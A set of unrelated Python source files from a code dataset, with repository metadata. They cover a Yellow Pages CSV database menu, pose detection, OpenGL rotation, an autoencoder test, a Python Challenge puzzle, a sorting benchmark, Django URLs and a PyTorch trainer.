dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n \n # sorting based on ID (0-9)\n else:\n # sorted ID\n idList = [data[index][0] for index in range(len(data))]\n idSort = sorted(idList) # order by ID 0-9 #\n\n # find the keys of dictionary\n keysTarget = []\n for valuesI in idSort: # compare sorted ID with 2D list[0] which is ID of each data in database, \n for valuesJ in data: # when match, return index[0] which is similar with keys\n if valuesI == valuesJ[0]:\n keysTarget.append(valuesJ[0])\n\n # data target in 2D list based on keysTarget\n dataTarget = [database[str(i)] for i in keysTarget]\n\n # show dataTarget in tabular format\n print(tabulate.tabulate(dataTarget, headers=database['columns'], tablefmt='github'))\n\n # back to main menu\n else:\n break\n\n\n# add data\ndef addMenu(database, pathRecord):\n \"\"\"Function to add data into your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n\n Return:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n while True:\n choices = ['Menambahkan data Yellow Pages', 'Kembali ke Main Menu']\n userInput = pyip.inputMenu(prompt='Select Add Menu:\\n', choices=choices, numbered=True)\n if userInput == 'Menambahkan data Yellow Pages':\n # check the ID does exist or not ?\n choices1 = [data[index][0] for index in range(len(data))]\n userInputIndex = pyip.inputInt(prompt='Masukkan ID (index) yang ingin ditambahkan: ') # input ID\n # if data already exist, show notification 'Data already exist!'\n if userInputIndex in choices1:\n print('ID already exist!')\n # if ID doesnt exist, you can add to database\n else:\n companyName = pyip.inputStr(prompt='input company name: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n businessField = pyip.inputStr(prompt='input business field: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n city = pyip.inputStr(prompt='input city: ', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n phoneNumber = pyip.inputInt(prompt='input phone number: ')\n if len(str(phoneNumber)) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\")\n email = pyip.inputEmail(prompt='input email: ')\n \n # 
display added data in tabular format\n tabularAddedData = [userInputIndex, companyName, businessField, city, phoneNumber, email]\n print(tabulate.tabulate(list([tabularAddedData]), headers=database['columns'], tablefmt=\"github\"))\n\n ## saving menu option\n savingMenuInput = pyip.inputYesNo(prompt='Are you sure want to save the data ? (Yes/No):')\n if savingMenuInput == 'yes':\n database.update(\n {f'{userInputIndex}': [userInputIndex, companyName, businessField, city, phoneNumber, email]})\n \n # show data after added data in database\n data.append(tabularAddedData)\n print(tabulate.tabulate(data, headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully saved!'\n print('\\nData successfully saved!\\n')\n \n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(ADD) User has added data with ID number {userInputIndex} at {dt_string}\\n')\n file.close()\n else:\n print('\\nOkey double check your input data!')\n \n # back to Main Menu\n else:\n break\n \n # keep database up to date\n return database\n\n\n# delete data\ndef deleteMenu(database, pathRecord, pathCsv):\n \"\"\"Function to delete data in your database\n\n Args:\n database (dict): database yang akan diolah\n pathRecord: variable that stored your path of record file\n pathCsv : variable that stored your path of csv file\n \n Returns:\n database: latest database\n \"\"\"\n\n # select delete menu\n while True:\n # read latest database\n readCsv(pathCsv)\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # run sub-delete menu\n choices1 = ['Delete data in Yellow Pages database', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Delete Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Delete data in Yellow Pages database':\n # ensure user how many ID that user want to delete\n userInput1 = pyip.inputChoice(prompt='How many ID that you want to delete ?\\nPlease select one of: one or more than one ? ', \n choices=['one', 'more than one'])\n \n # if user want to delete only one ID\n if userInput1 == 'one':\n userInput2 = pyip.inputInt(prompt='Enter ID that you want to delete in database:')\n if userInput2 in choices:\n # display data that you want to delete in tabular format\n print(tabulate.tabulate(list([database[str(userInput2)]]), headers=database['columns'], tablefmt=\"github\"))\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? 
(Yes/No):')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n del database[str(userInput2)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # run writeCsv function\n writeCsv(database, pathCsv)\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f'(DELETE) User has deleted data with ID number {userInput2} at {dt_string}\\n')\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n else:\n print(\"ID doesn't exist!\")\n\n # if user want to delete more than one ID\n else:\n\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices2 = [data[index][0] for index in range(len(data))]\n\n # ensure the user what is the exact amount of ID that user want to delete\n userInput3 = pyip.inputInt(prompt='Specify the exact amount of ID that you want to delete ?\\n', greaterThan=1, lessThan=len(data))\n # store IDs that user want to delete in a variable\n userInput4 = []\n for i in range(userInput3):\n userInput5 = pyip.inputMenu(prompt=f'Enter ID ke-{i+1} that you want to delete: \\nThese are the available ID:\\n', \n choices=valueInttoStr(choices2), lettered=True)\n # in order to showing the data that user want to delete\n userInput4.append(userInput5)\n # Delete the ID from the list of available ID because of ID has been selected, so that the user does not duplicate input \n choices2.remove(int(userInput5))\n\n # display IDs that user want to delete\n displayDeleteData = [database[i] for i in userInput4]\n print(tabulate.tabulate(displayDeleteData, headers=database['columns'], tablefmt=\"github\"))\n\n # Ensure user whether to delete or not ?\n deletingMenuInput = pyip.inputYesNo(prompt='Are you sure want to delete the data ? 
(Yes/No):\\n')\n # if 'Yes' delete data from database\n if deletingMenuInput == 'yes':\n # delete multiple ID\n for i in userInput4:\n del database[str(i)]\n # show database after data is deleted\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n\n # notification that data 'Data successfully deleted!'\n print('\\nData successfully deleted!')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(DELETE) User has deleted data with ID number {','.join(userInput4)} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check your input!\\n')\n # Back to main menu\n else:\n break\n # keep database up to date\n return database\n\n\n# update data\ndef updateMenu(database, pathRecord):\n \"\"\"Function to update a certain column and ID of your data in the database\n\n Args:\n database (dict): database to be processed\n pathRecord: variable that stores the path of your record file\n \n Returns:\n database: latest database\n \"\"\"\n # list of data\n data = list(database.values())[1:]\n\n # available ID\n choices = [data[index][0] for index in range(len(data))]\n\n # select update menu\n while True:\n choices1 = ['Edit data in Yellow Pages database', 'Back to Main Menu']\n userInput = pyip.inputMenu(prompt='Select Update Menu:\\n', choices=choices1, numbered=True)\n if userInput == 'Edit data in Yellow Pages database':\n userInputIndex = pyip.inputInt(prompt='Which ID do you want to update ?\\n')\n # if userInputIndex exists in database\n if userInputIndex in choices:\n # show row that user wants to update\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n updateMenuInput = pyip.inputYesNo(prompt='\\nDo you want to continue to update the data ? (Yes/No):') \n if updateMenuInput == 'yes':\n # print columns options\n userInputColumn = pyip.inputMenu(prompt='Which column do you want to update ?\\n', choices=database['columns'][1:], numbered=True) # output string\n # if the user selects a column that contains integer data type (phoneNumber)\n if type(database[str(userInputIndex)][database['columns'].index(userInputColumn)]) == int:\n # number of digits of phone number must be less than or equal to 11 digits\n while True:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputInt(prompt='Enter new value:')\n if len(str(database[str(userInputIndex)][database['columns'].index(userInputColumn)])) <= 11:\n break\n else:\n print(\"number of digits of the phone number must be less than or equal to 11 digits\") \n # if user chooses 'Email' column\n elif userInputColumn == 'Email':\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputEmail(prompt='Enter new value: ')\n # if the user selects a column that contains string data type\n else:\n database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputStr(prompt='Enter new value:', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n # show updated row\n print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n # Update data or not ?\n updateMenuInput1 = pyip.inputYesNo(prompt='\\nAre you sure want to update the data ? 
(Yes/No):') \n if updateMenuInput1 == 'yes':\n # show updated database\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully updated!'\n print('\\nData successfully updated!\\n')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(UPDATE) User has updated data with ID number {userInputIndex} in the {userInputColumn} column, then change the value into {database[str(userInputIndex)][database['columns'].index(userInputColumn)]} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check again your input data!\\n') \n # user does not continue to update data\n else:\n print('\\nOkey double check your input data!')\n # if ID doesnt exist \n else:\n print(\"The data you're looking for doesn't exist\\n\")\n # Back to main Menu\n else:\n break\n\n # keep database up to date\n return database","repo_name":"fnkhairudin/YellowPages","sub_path":"YellowPages.py","file_name":"YellowPages.py","file_ext":"py","file_size_in_byte":23764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
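readCsv above keys every row by its ID column and writeCsv rewrites the whole file. A compact sketch of that same load/modify/save round trip (file name and the 3-column schema are invented for illustration):

```python
# Minimal sketch of the dict-backed CSV persistence pattern used above.
import csv

PATH = 'phonebook.csv'  # hypothetical file

def load(path):
    with open(path, newline='') as f:
        rows = list(csv.reader(f, delimiter=';'))
    columns, data = rows[0], rows[1:]
    db = {'columns': columns}
    for row in data:
        db[row[0]] = row          # key each record by its ID column
    return db

def save(db, path):
    with open(path, 'w', newline='') as f:
        writer = csv.writer(f, delimiter=';')
        writer.writerow(db['columns'])
        writer.writerows(list(db.values())[1:])

db = {'columns': ['ID', 'name', 'city'],
      '1': ['1', 'Acme', 'Jakarta']}
save(db, PATH)
db2 = load(PATH)
db2['2'] = ['2', 'Globex', 'Bandung']  # add, like addMenu
del db2['1']                           # delete, like deleteMenu
save(db2, PATH)
```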
+{"seq_id":"37027678433","text":"import mediapipe as mp\r\nimport math\r\nimport cv2\r\n\r\nclass poseDetector():\r\n def __init__(self,\r\n staticMode=False,\r\n model_complexity=False,\r\n smooth=True,\r\n minDetectionCon=0.5,\r\n minTrackCon=0.5):\r\n\r\n self.staticMode = staticMode\r\n self.modelComplexity = model_complexity\r\n self.smooth = smooth\r\n self.minDetectionCon = minDetectionCon\r\n self.minTrackCon = minTrackCon\r\n\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpPose = mp.solutions.pose\r\n self.pose = self.mpPose.Pose(static_image_mode=self.staticMode, model_complexity=self.modelComplexity,\r\n smooth_landmarks=self.smooth,\r\n min_detection_confidence=self.minDetectionCon,\r\n min_tracking_confidence=self.minTrackCon)\r\n self.drawLandmarkSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, circle_radius=2, color=(255,0,0))\r\n self.drawConnectionSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, color=(34,247,10))\r\n\r\n\r\n def find_Person(self, frame, draw=True):\r\n self.imgRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n self.results = self.pose.process(self.imgRGB)\r\n if self.results.pose_landmarks and draw:\r\n self.mpDraw.draw_landmarks(frame, self.results.pose_landmarks,\r\n self.mpPose.POSE_CONNECTIONS, self.drawLandmarkSpec, self.drawConnectionSpec)\r\n return frame\r\n\r\n def find_landmarks(self, frame, draw=True):\r\n self.landmark_list=[]\r\n if self.results.pose_landmarks:\r\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\r\n h,w,c = frame.shape\r\n cx, cy = int(lm.x * w), int(lm.y * h)\r\n self.landmark_list.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(frame, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\r\n return self.landmark_list\r\n\r\n def find_angle(self, frame, p1, p2, p3, draw=True):\r\n # Get the landmarks\r\n x1, y1 = self.landmark_list[p1][1:]\r\n x2, y2 = self.landmark_list[p2][1:]\r\n x3, y3 = self.landmark_list[p3][1:]\r\n # Calculate the Angle\r\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\r\n math.atan2(y1 - y2, x1 - x2))\r\n if angle < 0:\r\n angle += 360\r\n print(\"ANGLE\")\r\n print(angle)\r\n\r\n # Draw\r\n if draw:\r\n cv2.line(frame, (x1, y1), (x2, y2), (255, 255, 255), 5)\r\n cv2.line(frame, (x3, y3), (x2, y2), (255, 255, 255), 5)\r\n cv2.circle(frame, (x1, y1), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x1, y1), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x2, y2), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x3, y3), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x3, y3), 16, (255, 60, 0), 2)\r\n\r\n cv2.putText(frame, str(int(angle)), (x3 - 50, y3 + 60),\r\n cv2.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 1)\r\n return angle\r\n\r\ndef main():\r\n cap = cv2.VideoCapture('TrainerData/curls.mp4')\r\n detector = poseDetector()\r\n while True:\r\n success, frame = cap.read()\r\n #frame = cv2.imread(\"TrainerData/bicep_curls.jpeg\")\r\n frame = detector.find_Person(frame)\r\n landmark_list = detector.find_landmarks(frame, draw=True)\r\n print(landmark_list)\r\n if len(landmark_list) != 0:\r\n print(landmark_list[16])\r\n cv2.circle(\r\n frame, (landmark_list[16][1], landmark_list[16][2]), 15, (0, 0, 255), cv2.FILLED)\r\n\r\n cv2.imshow(\"Image\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n 
main()","repo_name":"alazimariff/pythonAiTrainer","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27272030292","text":"from OpenGL.GL import *\nfrom curs.constants import *\nfrom PIL import Image\nimport numpy\n\nW = 0.2\nN = 6\n\nV = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n\nT_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n]\n\nQ_PLANES = [\n (V[0], V[3], V[8], V[5]), # 1\n (V[0], V[1], V[6], V[5]), # 2\n (V[1], V[2], V[7], V[6]), # 3\n (V[2], V[3], V[8], V[7]), # 4\n]\n\n\nclass NotConvex:\n\n def __init__(self):\n self.t = 0.0\n self.is_rotated = False\n self.rotation_times = 0\n self.change_direction_times = 0\n self.unit = 1\n self.update(self.unit)\n self.rotation_limit = N\n\n def draw(self):\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, WHITE)\n if not self.is_rotated:\n if self.rotation_times == N or self.rotation_times == N * 2:\n self.change_direction()\n self.rotate(self.unit)\n else:\n self.update(self.unit)\n # glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glBegin(GL_TRIANGLES)\n for plane in T_PLANES:\n for vertex in plane:\n D = numpy.sqrt(pow(vertex[0], 2) + pow(vertex[1], 2) + pow(vertex[2], 2))\n normale_x = vertex[0] - V[4][0]\n normale_y = vertex[1] - V[4][1]\n normale_z = vertex[2] - V[4][2]\n glNormal3f(normale_x, normale_y, normale_z)\n glVertex3f(vertex[0], vertex[1], vertex[2])\n glEnd()\n\n # glBegin(GL_QUADS)\n # for plane in Q_PLANES:\n # for vertex in plane:\n # print(vertex)\n # glNormal3f(vertex[0], vertex[1], vertex[2])\n # glVertex3f(vertex[0], vertex[1], vertex[2])\n # glEnd()\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, (0, 0, 0, 0))\n\n def position(self, t=0):\n self.t = t\n\n def change_direction(self):\n self.change_direction_times += 1\n self.rotation_times = 1\n self.is_rotated = False\n self.unit += 1\n\n def rotate(self, unit):\n if unit == 1:\n self.rotateXY()\n if unit == 2:\n self.rotateYZ()\n if unit == 3:\n self.rotateXY2()\n\n def rotateXY(self, direction=1):\n x0 = V[5][0]\n y0 = V[5][1]\n for i in range(len(V)):\n if (i == 5 or i == 6):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n new_angle = angle + self.t\n # if i == 0 and angle >= numpy.pi / 2:\n # self.t += 0.005 * (self.unit * self.rotation_limit + self.rotation_times)\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_x = x0 + direction * R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateXY2(self):\n x0 = V[8][0]\n y0 = V[8][1]\n for i in range(len(V)):\n if (i == 8 or i == 7):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n if i == 0 and angle <= 2 * numpy.pi / 3:\n self.t += 0.05\n new_angle = angle - self.t\n if new_angle <= 0:\n self.is_rotated = True\n break\n new_x = x0 + R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateYZ(self):\n y0 = V[8][1]\n z0 = V[8][2]\n for i in range(len(V)):\n if (i == 5 or i == 8):\n continue\n vertex = V[i]\n y = 
vertex[1]\n z = vertex[2]\n R = numpy.sqrt(pow(y - y0, 2) + pow(z - z0, 2))\n angle = numpy.arccos((z0 - z) / R)\n if i == 0 and angle >= numpy.pi / 3:\n self.t += 0.01\n new_angle = angle + self.t\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_y = y0 + R * numpy.sin(new_angle)\n new_z = z0 - R * numpy.cos(new_angle)\n vertex[1] = new_y\n vertex[2] = new_z\n\n def update(self, unit):\n global V\n global T_PLANES\n V = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n for v in V:\n if unit == 1:\n v[0] -= W * 2 * self.rotation_times\n if unit == 2:\n v[0] -= W * 2 * (N - 1)\n v[2] += W * 2 * self.rotation_times\n if unit == 3:\n v[0] -= W * 2 * (N - 1) - W * 2 * self.rotation_times\n v[2] += W * 2 * (N - 1)\n\n T_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n ]\n self.is_rotated = False\n self.rotation_times += 1\n","repo_name":"veronikaKochugova/OpenGL","sub_path":"curs/NotConvex.py","file_name":"NotConvex.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
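Each rotateXY/rotateYZ step above moves a vertex on a circle around a pivot: convert to polar coordinates about the pivot, add an increment, convert back. A sketch of that single step (values invented); arctan2 is used here instead of the record's arccos((x-x0)/R), which loses the sign of the y offset:

```python
# Rotation-about-a-pivot step underlying rotateXY (toy values).
import numpy as np

def rotate_about(x, y, x0, y0, dtheta):
    r = np.hypot(x - x0, y - y0)            # radius from the pivot
    angle = np.arctan2(y - y0, x - x0)      # sign-safe polar angle
    angle += dtheta
    return x0 + r * np.cos(angle), y0 + r * np.sin(angle)

print(rotate_about(1.0, 0.0, 0.0, 0.0, np.pi / 2))  # ~(0.0, 1.0)
```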
+{"seq_id":"22242061338","text":"\nimport cv2\nfrom visualize import visualize, show_image\nfrom load_dataset import load_image\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\n# Load autoencoder model\nautoencoder_faces = load_model('models/faces/faces.h5')\nautoencoder_cocoon = load_model('models/cocoon/cocoon.h5')\nprint(autoencoder_faces.summary())\nprint(autoencoder_cocoon.summary())\n\n# Testing\ntst_img = load_image(\"test_images/selfie.webp\")\ntst_img = tst_img.astype('float32')/255.0 - 0.5\ntst_img_32 = cv2.resize(tst_img, (32, 32))\ntst_img_32 = cv2.resize(tst_img, (32, 32))\nout1 = autoencoder_faces.predict(tst_img_32[None])[0]\nout2 = autoencoder_cocoon.predict(tst_img_32[None])[0]\n#visualize(tst_img,encoder,decoder)\n\nplt.subplot(2,2,1)\nplt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,2)\nplt.title(\"Reconstructed\")\nshow_image(out1)\n\nplt.subplot(2,2,3)\n#plt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,4)\n#plt.title(\"Reconstructed\")\nshow_image(out2)\nplt.show()","repo_name":"dvillacis/objeto_selfie","sub_path":"test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34205031945","text":"\"\"\"\nhttp://huge:file@www.pythonchallenge.com/pc/return/evil.html\n\"\"\"\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nDATA = \"http://huge:file@www.pythonchallenge.com/pc/return/evil2.gfx\"\n\n\ndef solve():\n data = requests.get(DATA).content\n\n for offset in range(5):\n img_data = bytes(b for b in data[offset::5])\n Image.open(BytesIO(img_data)).show()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"arjandepooter/python-challenge","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3985111855","text":"import os\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport subprocess\nimport sys\n\ndata_sizes = [10000, 50000, 100000, 200000, 300000, 400000,\n 500000, 600000, 700000, 800000, 900000, 1000000]\nsort_times = {'heap_sort': [], 'merge_sort': [],\n 'quick_sort': [], 'shell_sort': []}\n\n\ndef compile_exe(sort_name: str) -> None:\n path = './src/{}.cpp'.format(sort_name)\n os.system('g++ -o ./exe/{} {}'.format(sort_name, path))\n\n\ndef call_exe(sort_name: str, random_data: list[int]) -> float:\n path = './exe/{}.exe'.format(sort_name)\n\n start_time = time.time()\n out = subprocess.Popen(path, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n out = out.communicate(input=' '.join(\n [str(i) for i in random_data]).encode('utf-8'))[0]\n end_time = time.time()\n\n out = out.decode('utf-8').split()\n out = [int(i) for i in out]\n if not check_sorted(out):\n print('Error: {} is not sorted!'.format(sort_name))\n sys.exit(1)\n\n return end_time - start_time\n\n\ndef check_sorted(data: list) -> bool:\n for i in range(len(data) - 1):\n if data[i] > data[i + 1]:\n return False\n return True\n\n\ndef generate_random_data(data_size: int) -> list[int]:\n data = [i for i in range(data_size)]\n random.shuffle(data)\n return data\n\n\ndef paint_data() -> None:\n for sort_name in sort_times.keys():\n plt.plot(data_sizes, sort_times[sort_name], label=sort_name)\n plt.xlabel('data size')\n plt.ylabel('running time')\n plt.title('running time of different sorting algorithms')\n plt.legend()\n plt.savefig('running_time.png')\n\ndef main() -> None:\n for sort_name in sort_times.keys():\n compile_exe(sort_name)\n\n for data_size in data_sizes:\n print('data size: {}'.format(data_size))\n random_data = generate_random_data(data_size)\n for sort_name in sort_times.keys():\n sort_times[sort_name].append(call_exe(sort_name, random_data))\n print('{} running time: {:.3f}'.format(sort_name, sort_times[sort_name][-1])) \n\n paint_data()\n\n\nif __name__ == '__main__': \n main()\n","repo_name":"fatbrother/Sorting-Graph","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71526725852","text":"from django.urls import path\n\nfrom .views import getLiked, insertLiked, deleteLiked, getLikedMoive\n\nurlpatterns = [\n path('getLiked/', getLiked, name='getLiked'),\n path('insertLiked/', insertLiked, name='insertLiked'),\n path('deleteLiked/', deleteLiked, name='deleteLiked'),\n path('getLikedMoive/', getLikedMoive, name='getLikedMoive')\n]\n","repo_name":"BaeJihyun97/Movie_Recommendation","sub_path":"backend/djangoreactapi/service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69894445851","text":"import torch\nimport os\n\nfrom abc import abstractmethod\nfrom numpy import inf\nfrom utils.io import prepare_device\nfrom logger import TensorboardWriter\n\nimport models.hppw as module_arch\nimport models.hppw as module_metric\nimport models.hppw as module_loss\nfrom models.projection.model import LinearProjection\nfrom utils.io import MetricTracker\n\nimport wandb\n\n\n\nclass BaseTrainer:\n \"\"\"\n Base class for all trainers\n \"\"\"\n def __init__(self, config):\n\n self.config = config\n self.logger = self.config.get_logger('trainer', config['trainer']['verbosity'])\n \n cfg_trainer = config['trainer']\n self.epochs = cfg_trainer['epochs']\n self.save_period = cfg_trainer['save_period']\n self.eval_period = cfg_trainer['eval_period']\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.checkpoint_dir = config.save_dir\n\n # setup visualization writer instance\n self.writer = None\n if config['tensorboard']:\n self.writer = TensorboardWriter(config.log_dir, self.logger)\n\n\n self.start_epoch = 1\n self.best_epoch = 1\n self.best_epoch = 1\n self.current_epoch = 1\n self.best_top1 = 0\n\n # prepare for (multi-device) GPU training\n # This part doesn't do anything if you don't have a GPU.\n self._device, self._device_ids = prepare_device(config['n_gpu'])\n self.wandb_enabled = config['wandb']\n if self.wandb_enabled:\n self.wandb = wandb\n\n self.wandb.login()\n self.wandb.init(project=\"human-pose-prediction-in-the-wild\")\n \n self.model = config.init_obj('arch', module_arch)\n self.model_proj = LinearProjection(**config[\"arch3d\"])\n self.model.to(self._device)\n if len(self._device_ids) > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=self._device_ids)\n\n # Simply Log the model (enable if you want to see the model architecture)\n # self.logger.info(self.model)\n # Prepare Losses\n # self.criterion = getattr(module_loss, config['loss'])\n self.criterion = getattr(module_loss, config['loss'][\"type\"])\n # Prepare Optimizer\n trainable_params = filter(lambda p: p.requires_grad, self.model.parameters())\n self.optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n self.lr_scheduler = config.init_obj('lr_scheduler', torch.optim.lr_scheduler, self.optimizer) \n \n self.metric_ftns = [getattr(module_metric, met['type'])(**met['args']) for met in config['metrics']]\n self.epoch_metrics = 
